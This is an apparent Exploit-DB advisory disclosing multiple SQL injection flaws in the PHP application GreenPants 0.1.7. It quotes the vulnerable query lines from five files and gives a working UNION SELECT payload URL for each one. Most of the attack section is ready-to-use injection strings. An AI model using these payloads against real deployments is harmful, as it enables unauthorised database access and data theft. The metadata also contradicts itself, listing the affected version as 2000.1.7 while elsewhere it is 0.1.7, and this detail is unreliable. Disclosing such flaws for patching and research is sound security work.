Vendor: GreenPants
By: Ptrace Security (Gianni Gnesa [gnix])
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injections)
Product Name: GreenPants
Affected Version From: 2000.1.7
Affected Version To: 2000.1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:greenpants:greenpants:0.1.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS 5.2
2011

GreenPants 0.1.7 Multiple Vulnerabilities

GreenPants 0.1.7 is vulnerable to multiple SQL injections. The vulnerable files are indexheader.php, searcher.php, indexviewentry.php, editcat.php and editemot.php; each interpolates a request parameter directly into a SQL query string. An attacker can exploit these vulnerabilities by sending malicious input to the vulnerable parameters. For example, http://localhost/greenpants/index.php?id=-99 UNION SELECT VERSION() can be used to exploit the vulnerability in indexheader.php.

Mitigation:

Input validation should be used to prevent SQL injections. The application should also be tested for SQL injections using automated tools.

Exploit-DB raw data:

# Exploit Title:   GreenPants 0.1.7 Multiple Vulnerabilities
# Date         :   19 March 2011
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/greenpants/
# Version      :   0.1.7
# Tested on    :   CentOS 5.2 with magic_quotes_gpc off
# Thanks to    :   The Resistance Group (http://www.ptrace.net/theresistance)

# SQL Injections

[01] ./pages/indexheader.php:36:    $res = consultarsql("SELECT tit FROM gp_entradas WHERE id=$id;");
     => http://localhost/greenpants/index.php?id=-99 UNION SELECT VERSION()

[02] ./pages/searcher.php:27:       $res = consultarsql("SELECT * FROM gp_entradas WHERE tit LIKE '%$s%'");
     => http://localhost/greenpants/index.php?s=4X0r' UNION SELECT NULL,VERSION(),NULL,NULL,NULL,NULL -- '

[03] ./pages/indexviewentry.php:25: $res = consultarsql("SELECT * FROM gp_entradas WHERE id=$id");
     => http://localhost/greenpants/index.php?id=-99 UNION SELECT NULL,VERSION(),NULL,NULL,NULL,NULL

[04] ./admin/pages/editcat.php:10:  $res = consultarsql("SELECT * FROM gp_categorias WHERE id=$id;");
     => http://localhost/greenpants/admin/index.php?do=editcat&i=-99 UNION SELECT NULL,VERSION(),NULL

[05] ./admin/pages/editemot.php:10: $res = consultarsql("SELECT * FROM gp_emoticonos WHERE id=$id;");
     => http://localhost/greenpants/admin/index.php?do=editemot&i=-99 UNION SELECT NULL,VERSION(),NULL,NULL